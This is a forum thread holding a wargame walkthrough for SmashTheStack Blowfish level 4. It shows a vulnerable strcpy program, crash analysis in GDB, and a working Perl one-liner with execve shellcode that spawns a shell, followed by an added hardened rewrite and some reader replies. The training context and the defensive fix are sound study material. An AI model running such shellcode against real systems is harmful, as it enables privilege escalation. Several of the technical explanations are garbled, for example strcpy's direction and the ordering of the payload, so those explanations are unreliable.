[STS]Level 4 - Blowfish
  • chroniccommand
    Posts: 1,389
    I will now be going over level 4 of SmashTheStack's blowfish series.

    Part 1 - Logging in
    SSH to
    level4@blowfish.smashthestack.org port 2222

    And use the password acquired from Level 3. You should get this login banner.

    ssh level4@blowfish.smashthestack.org -p 2222


    1. Thou shalt NOT root or otherwise harm the box.
    2. Thou shalt NOT access any other network from this box.
    3. Thou shalt NOT use any other directory besides /tmp or /code for code.
    4. Thou shalt give the root pass to l3thal if you manage to change it.

    Passwords are in /pass.
    There is a README in each users home directory.
    /tmp && /var/tmp will be flushed daily by cron.
    Use /code plz for umm, code ;D
    IF YOU LEAVE FILES IN /levels/tmp U SUCK ..plz remove them kthnx! ;D
    The password for the last level will get you into
    Tux, the more advanced wargame. Join #blowfish on
    irc.smashthestack.org with any questions.

    Admins - l3thal && cr

    Forum: http://smashthestack.org/viewforum.php?id=10

    Last login: Thu Jan 28 16:08:31 2010 from host-studentw-142-173.dhcp.stevens-tech.edu

    There is a buffer overflow in /levels/level4
    exploit it and move on to the next level!

    Here's a tutorial i wrote just for this level:

    - http://smashthestack.org/l3thal/bof.txt

    Have fun!!

    So this is our first ever Buffer OverFlow in SmashTheStack. How fun!

    Part 2 - Smashing that stack
    So now we follow the directions, and drop to
    /levels

    And do an "ls". From here we see all the level.c source code and the compiled sources. What we want to do now is cd to the tmp directory and make a new directory. So
    cd /levels/tmp
    mkdir chronic
    cd chronic
    cp /levels/level4.c* .
    cp /levels/level4* .

    This will change to /levels/tmp, make a new directory, change to that directory, and copy the level's source code and compiled program. Now we need to see what we're dealing with. Perform this command:
    cat level4.c

    This will spit out the level4.c source code. It should look like this:

    #include <stdio.h>
    #include <stdlib.h>   /* exit() */
    #include <string.h>   /* strcpy() */

    int main(int argc, char * argv[]) {

        char buf[256];    /* fixed-size buffer on the stack */

        if(argc == 1) {
            printf("Usage: %s input\n", argv[0]);
            exit(0);
        }

        /* unbounded copy: an argv[1] longer than 255 bytes runs past buf */
        strcpy(buf,argv[1]);
        printf("%s", buf);

        return 0;
    }

    This is C code. If you've been following my C for newcomers guide, you should know a thing or two about C. This is setting the character of "buf" to 256. We can tell it's vulnerable because it's using the function "strcpy" to copy the buffer into "argv[1]", then printing the buffer. Now if you read my "Smashing the stack" guide, you should know some basic maneuvers for OverFlows such as this one. We know Perl is installed on the system, so let's use that to our advantage. Try this:
    ./level4 `perl -e 'print "A"x300'`

    By now, you should know this is executing Perl's Print function on ./level4 (the compiled level4.c program). What this is doing is printing the letter A (0x41 in hex), 300 times. The reason it is 300 is because the buffer is 256, and we must overflow it. The reason we can't just use 257 is because the compiler adds some "padding" to the program. So 300 should overflow just fine. We should get this output:
    Segmentation fault (core dumped)

    This means 300 was enough to dump the core, and the saved return address was overwritten. So now we must open up the core with GDB. GDB is a disassembler that we will be using to disassemble the dumped core. Do an "ls" and you should see a file like "core.randomnumbers". We open up the core using this:
    gdb -c core.1571

    Change 1571 with the number after your core. This should open up GDB. It should look like this:

    GNU gdb 6.8-debian
    Copyright (C) 2008 Free Software Foundation, Inc.
    License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
    This is free software: you are free to change and redistribute it.
    There is NO WARRANTY, to the extent permitted by law. Type "show copying"
    and "show warranty" for details.
    This GDB was configured as "i486-linux-gnu".
    Core was generated by `./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
    Program terminated with signal 11, Segmentation fault.
    [New process 17916]
    #0 0x41414141 in ?? ()

    So we see where the core was generated, with the A's. From here try typing this:
    i r

    This stands for "Info Registers". This will pull up all the programs registers.
    Look at the IR's and you should notice something called EIP. It should look like this:
    eip            0x41414141	0x4141414

    This is something we must pay attention to. EIP stands for Extended Instruction Pointer. It points the program to the next memory address. We can use this to our advantage by cramming ShellCode into the EIP. Shellcode is bytes of code written in Assembler that tell the program what to do. So now all we need to do is cram the shellcode in there, and we should get a privilege escalation. Try this code:
    ./level4 `perl -e 'print "A"x300 . "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" . "\xc4\xd9\xff\xbf"'`

    This is what the shellcode looks like. The first part is the actual shellcode, and the second part is padding we use. We should get something that looks like this:
    sh-3.2$

    This means we now have a Stand Alone Shell. We can issue commands from here, but we still don't have privileges to read from /pass/level5. Oh man :/
    This can be easily fixed. It's because we didn't perform it on the actual level4, only the one in the tmp directory. Figure out what to do from here. If you do it right then you should have a stand alone shell, and the ability to read from /levels/level5.

    --Chroniccommand
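As an added example (my own code, not part of chroniccommand's post and not the wargame's level4.c), here is the same 256-byte stack buffer with the unchecked strcpy replaced by a bounded copy that rejects input which would not fit. The names safe_copy, handle_input and accepts_length are mine; accepts_length builds a constructed run of 'A' bytes so the 300-byte probe from the post can be fed through the hardened version without crashing it.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Same buffer size as the level's program. */
#define BUF_SIZE 256

/*
 * Bounded copy that refuses input which would not fit, NUL included.
 * Returns 0 on success, -1 if src is too long for dst.
 * This is the replacement for the unchecked strcpy(buf, argv[1]).
 */
int safe_copy(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);

    if (dst_size == 0 || len >= dst_size) {
        return -1;              /* would overflow: reject instead of copying */
    }
    memcpy(dst, src, len + 1);  /* len + 1 also copies the terminating NUL */
    return 0;
}

/*
 * Hardened equivalent of the level's main body.
 * Returns 1 if the input was accepted and echoed, 0 if it was rejected.
 * The 256-byte stack buffer is unchanged; only the copy is bounded, so
 * nothing past buf (saved EBP, saved return address) can be reached.
 */
int handle_input(const char *input)
{
    char buf[BUF_SIZE];

    if (safe_copy(buf, sizeof buf, input) != 0) {
        fprintf(stderr, "input too long: %zu bytes, limit is %zu\n",
                strlen(input), sizeof buf - 1);
        return 0;
    }
    printf("%s\n", buf);
    return 1;
}

/*
 * Helper (hypothetical, for testing): build a constructed input of n 'A'
 * bytes, mirroring perl -e 'print "A"x300' from the post, and run it
 * through handle_input. Returns handle_input's result, or -1 on OOM.
 */
int accepts_length(size_t n)
{
    char *probe = malloc(n + 1);
    int accepted;

    if (probe == NULL) {
        return -1;
    }
    memset(probe, 'A', n);
    probe[n] = '\0';
    accepted = handle_input(probe);
    free(probe);
    return accepted;
}

int main(int argc, char *argv[])
{
    if (argc == 1) {
        printf("Usage: %s input\n", argv[0]);
        return 0;
    }
    return handle_input(argv[1]) ? 0 : 1;
}
```

Run it as `./hardened $(perl -e 'print "A"x300')` and it prints the rejection message and exits non-zero instead of segfaulting. Independently of the source fix, building with `gcc -O2 -fstack-protector-strong -D_FORTIFY_SOURCE=2` turns an overflow in the original version into an abort (the stack canary check or the fortified `__strcpy_chk` fires) before the overwritten return address is ever used, which is why those flags are on by default in most modern distributions.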
  • Xin
    Posts: 3,251
    Good job, I'm gonna start these when I get the chance :)
    Xin
  • chroniccommand
    Posts: 1,389
    No problem, I worked hard on this :P
  • x3n0n
    Posts: 110
    When I try to get the address of my NOP sled (x/20s $esp) it doesn't show where the NOP is written :S
    Any thoughts on that?

    Never mind, I figured it out ;)
    --> x/2000xb $esp
    It displays the content of the stack addresses in another way (a way where you can spot everything much better)
  • h4ckingURLife
    Posts: 125
    Hmm, interesting. Thanks for the share, I bookmarked. :)